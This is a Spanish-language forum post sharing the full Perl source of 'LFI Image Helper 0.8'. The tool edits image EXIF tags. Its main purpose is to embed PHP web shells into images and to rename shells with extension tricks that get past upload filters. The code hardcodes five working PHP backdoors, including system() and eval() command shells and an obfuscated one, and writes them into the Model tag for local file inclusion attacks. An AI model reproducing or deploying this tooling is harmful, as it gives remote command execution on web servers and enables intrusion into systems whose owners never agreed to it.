Autor Tema: [Perl] LFI Image Helper 0.8 (Leído 2736 veces)

BigBear · « **en:** Mayo 08, 2015, 03:58:59 pm »

Un simple script en Perl para colocar codigo de phpshells en imagenes , el script tiene las siguientes opciones :

Listar todos los Tags de la imagen con contenido
Listar solo los Tags
Leer el valor de cierto Tag
Crear un Tag nuevo
Editar un Tag
Borrar un Tag
Infectar una imagen con un backdoor conocido en PHP

El codigo :

Código: Perl

#!usr/bin/perl
#LFI Image Helper 0.8
#(C) Doddy Hackman 2015
#ppm install  http://trouchelle.com/ppm/Image-ExifTool.ppd
#
#Array @shells based on : OhNo - Evil Image Builder By Hood3dRob1n
#Thanks to Hood3dRob1n
#
#Dump Values
#Based on :http://www.nntp.perl.org/group/perl.beginners/2012/02/msg119913.html
#Thanks to Ken Slater
#
use Image::ExifTool;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
 
my @shells = (
 
    {},
 
    {
 
        "nombre"  => "Simple Backdoor",
        "codigo"  => '<?php system($_GET["cmd"]);exit(1); ?>',
        "ejemplo" => "?cmd="
 
    },
    {
 
        "nombre" => "System Shell",
        "codigo" =>
'<?error_reporting(0);print(___);system($_REQUEST[cmd]);print(___);die;?>',
        "ejemplo" => "?cmd="
 
    },
    {
 
        "nombre" => "Eval Shell",
        "codigo" =>
'<?error_reporting(0);print(___);eval($_REQUEST[cmd]);print(___);die;?>',
        "ejemplo" => "?cmd="
 
    },
    {
 
        "nombre" => "Sneaky Shell",
        "codigo" =>
'<?php @$_[][email protected]!+_; [email protected]${_}>>$_;$_[]=$__;$_[][email protected]_;$_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_] );?>',
        "ejemplo" => "?0="
 
    },
    {
 
        "nombre" => "r0ng Shell",
        "codigo" =>
          '<?if($_GET["r0ng"]){echo"<pre>".shell_exec($_GET["r0ng"]);}?>',
        "ejemplo" => "?r0ng="
 
    }
 
);
 
GetOptions(
    "dump_all=s"   => \$dump_all,
    "dump_tags=s"  => \$dump_tags,
    "read_tag=s"   => \$read_tag,
    "tag=s"        => \$tag,
    "make_tag=s"   => \$make_tag,
    "value=s"      => \$value,
    "update_tag=s" => \$update_tag,
    "delete_tag=s" => \$delete_tag,
    "backdoor=s"   => \$backdoor,
    "bypass=s"     => \$bypass,
    "file=s"       => \$file
);
 
head();
 
if ($dump_all) {
 
    if ( -f $dump_all ) {
        printear_titulo("[+] Finding information in : ");
        print $dump_all. "\n\n";
        dump_all($dump_all);
    }
    else {
        printear("[-] File not found\n");
    }
 
}
elsif ($dump_tags) {
 
    if ( -f $dump_tags ) {
        printear_titulo("[+] Finding tags in : ");
        print $dump_tags. "\n\n";
        dump_tags($dump_tags);
    }
    else {
        printear("[-] File not found\n");
    }
}
elsif ($read_tag) {
 
    if ( -f $read_tag ) {
        printear_titulo("[+] Finding tag value of $tag in : ");
        print $read_tag. "\n\n";
        read_tag( $read_tag, $tag );
    }
    else {
        printear("[-] File not found\n");
    }
 
}
 
elsif ($make_tag) {
 
    if ( -f $make_tag ) {
 
        printear_titulo("[+] Photo : ");
        print $make_tag. "\n";
        printear_titulo("[+] Name : ");
        print $tag. "\n";
        printear_titulo("[+] Value : ");
        print $value. "\n\n";
 
        printear("[+] Making tag $tag ...\n\n");
 
        make_tag( $make_tag, $tag, $value );
 
    }
    else {
        printear("[-] File not found\n");
    }
}
elsif ($update_tag) {
 
    if ( -f $update_tag ) {
 
        printear_titulo("[+] Photo : ");
        print $update_tag. "\n";
        printear_titulo("[+] Name : ");
        print $tag. "\n";
        printear_titulo("[+] Value : ");
        print $value. "\n\n";
 
        printear("[+] Updating tag $tag ...\n\n");
 
        update_tag( $update_tag, $tag, $value );
 
    }
    else {
        printear("[-] File not found\n");
    }
}
elsif ($delete_tag) {
 
    if ( -f $delete_tag ) {
        printear_titulo("[+] Deleting tag $tag in : ");
        print $delete_tag. "\n\n";
        delete_tag( $delete_tag, $tag );
    }
    else {
        printear("[-] File not found\n");
    }
 
}
elsif ($backdoor) {
 
    if ( -f $backdoor ) {
 
        printear_titulo("[+] Photo : ");
        print $backdoor. "\n\n";
 
        printear("[+] 1 : ");
        print "Simple Backdoor\n";
        printear("[+] 2 : ");
        print "System Shell\n";
        printear("[+] 3 : ");
        print "Eval Shell\n";
        printear("[+] 4 : ");
        print "Sneaky Shell\n";
        printear("[+] 5 : ");
        print "r0ng Shell\n";
 
        printear_titulo("\n[+] Option : ");
        chomp( my $opcion = <stdin> );
 
        backdoor_tag( $backdoor, $opcion, $file );
 
    }
    else {
        printear("[-] File not found\n");
    }
 
}
elsif ($bypass) {
 
    if ( -f $bypass ) {
 
        my $source = readfile($bypass);
 
        printear_titulo("[+] PHP Shell : ");
        print $bypass. "\n\n";
 
        printear("[+] 1 : ");
        print "bypass.jpg.php\n";
        printear("[+] 2 : ");
        print "bypass.php;test.jpg\n";
        printear("[+] 3 : ");
        print "bypass.php%00.jpg\n";
 
        printear_titulo("\n[+] Option : ");
        chomp( my $opcion = <stdin> );
 
        if ( $opcion eq "1" ) {
            savefile( $file . ".jpg.php", $source );
            chmod 0777, $file . ".jpg.php";
        }
        elsif ( $opcion eq "2" ) {
            savefile( $file . ".php;test.jpg", $source );
            chmod 0777, $file . ".php;test.jpg";
        }
        elsif ( $opcion eq "3" ) {
            savefile( $file . ".php%00.jpg", $source );
            chmod 0777, $file . ".php%00.jpg";
        }
        else {
            savefile( $file . ".jpg.php", $source );
            chmod 0777, $file . ".jpg.php";
        }
 
        printear("\n[+] PHP Shell Bypassed\n");
 
    }
    else {
        printear("\n[-] File not found\n");
    }
 
}
else {
    sintax();
}
 
copyright();
 
# Functions
 
sub backdoor_tag {
 
    my $image  = $_[0];
    my $opcion = $_[1];
    my $final  = $_[2];
 
    my $tag     = "Model";
    my $nombre  = $shells[$opcion]->{nombre};
    my $valor   = $shells[$opcion]->{codigo};
    my $ejemplo = $shells[$opcion]->{ejemplo};
 
    printear("\n[+] Backdoor Name : ");
    print "$nombre\n";
    printear("[+] Backdoor Example : ");
    print "$ejemplo\n";
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($image);
 
    $datos_imagen->SetNewValue( $tag, $valor );
 
    unlink($final);
 
    $ok = $datos_imagen->WriteInfo( $image, $final );
 
    if ( $ok eq "1" ) {
        printear_titulo("\n[+] Backdoor : ");
        print "OK\n";
        chmod 0777, $final;
    }
    else {
        printear_titulo("\n[-] Backdoor: ");
        print "Error\n";
    }
 
}
 
sub delete_tag {
 
    my $imagen_target = $_[0];
    my $tag           = $_[1];
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
 
    $datos_imagen->SetNewValue( $tag, undef );
 
    $ok = $datos_imagen->WriteInfo($imagen_target);
 
    if ( $ok eq "1" ) {
        printear_titulo("[+] Tag $tag : ");
        print "Deleted\n";
    }
    else {
        printear_titulo("[-] Tag $tag : ");
        print "Error\n";
    }
 
}
 
sub update_tag {
 
    my $image = $_[0];
    my $tag   = $_[1];
    my $valor = $_[2];
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($image);
 
    $datos_imagen->SetNewValue( $tag, $valor );
 
    $ok = $datos_imagen->WriteInfo($image);
 
    if ( $ok eq "1" ) {
        printear_titulo("[+] Tag $tag : ");
        print "Updated\n";
    }
    else {
        printear_titulo("[-] Tag $tag : ");
        print "Error\n";
    }
 
}
 
sub make_tag {
 
    my $image = $_[0];
    my $name  = $_[1];
    my $value = $_[2];
 
    my $poc = Image::ExifTool->new();
 
    $poc->ExtractInfo($image);
    $poc->SetNewValue( $name, $value );
 
    $ok = $poc->WriteInfo($image);
 
    if ( $ok eq "1" ) {
        printear_titulo("[+] Tag $name : ");
        print "Created\n";
    }
    else {
        printear_titulo("[-] Tag $name : ");
        print "Error\n";
    }
 
}
 
sub read_tag {
 
    $imagen_target = $_[0];
    $tag           = $_[1];
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
 
    $valor = $datos_imagen->GetValue($tag);
 
    if ( $valor eq "" ) {
        printear("[-] Tag not found\n");
    }
    else {
        printear("[+] $tag : ");
        print $valor. "\n";
    }
 
}
 
sub dump_tags {
 
    my $imagen_target = $_[0];
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
 
    @tags = $datos_imagen->GetFoundTags("File");
 
    for my $tag (@tags) {
        printear("[+] Tag : ");
        print $tag. "\n";
    }
 
}
 
sub dump_all {
 
    my $imagen_target = $_[0];
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
 
    for my $abriendo_imagen ( $datos_imagen->GetFoundTags("Group0") ) {
        my $valor = $informacion_imagen->{$abriendo_imagen};
        printear("[+] $abriendo_imagen : ");
        print $valor. "\n";
    }
 
}
 
sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;
}
 
sub readfile {
    open my $FILE, q[<], $_[0];
    my $word = join q[], <$FILE>;
    close $FILE;
    return $word;
}
 
sub printear {
    cprint( "\x036" . $_[0] . "\x030" );
}
 
sub printear_logo {
    cprint( "\x037" . $_[0] . "\x030" );
}
 
sub printear_titulo {
    cprint( "\x0310" . $_[0] . "\x030" );
}
 
sub sintax {
 
    printear("[+] Sintax : ");
    print "perl $0 <option> <value>\n";
    printear("\n[+] Options : \n\n");
    print "-dump_all <image> : Get all information of a image\n";
    print "-dump_tags <image> : Get all tags of a image\n";
    print "-read_tag <image> -tag <tag> : Read value tags of a image\n";
    print "-make_tag <image> -tag <tag> -value <value> : Make a new tag\n";
    print "-update_tag <image> -tag <tag> -value <value> : Update tag\n";
    print "-delete_tag <image> -tag <tag> : Delete tag\n";
    print "-backdoor <image> -file <name> : Insert backdoor in a image\n";
    print
"-bypass <php shell> -file <name> : Rename extension of a image to bypass\n";
    printear("\n[+] Example : ");
    print "perl lfi_image_helper.pl -dump_all test.jpg\n";
    copyright();
}
 
sub head {
    printear_logo("\n-- == LFI Image Helper 0.8 == --\n\n\n");
}
 
sub copyright {
    printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
    exit(1);
}
 
sub toma {
    return $nave->get( $_[0] )->content;
}
 
#The End ?
 

Un video con ejemplos de uso :

Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
Github.

¿Sabes el motivo de que fallen tanto algunas impresoras Epson?

Autor Tema: [Perl] LFI Image Helper 0.8 (Leído 2736 veces)

BigBear

[Perl] LFI Image Helper 0.8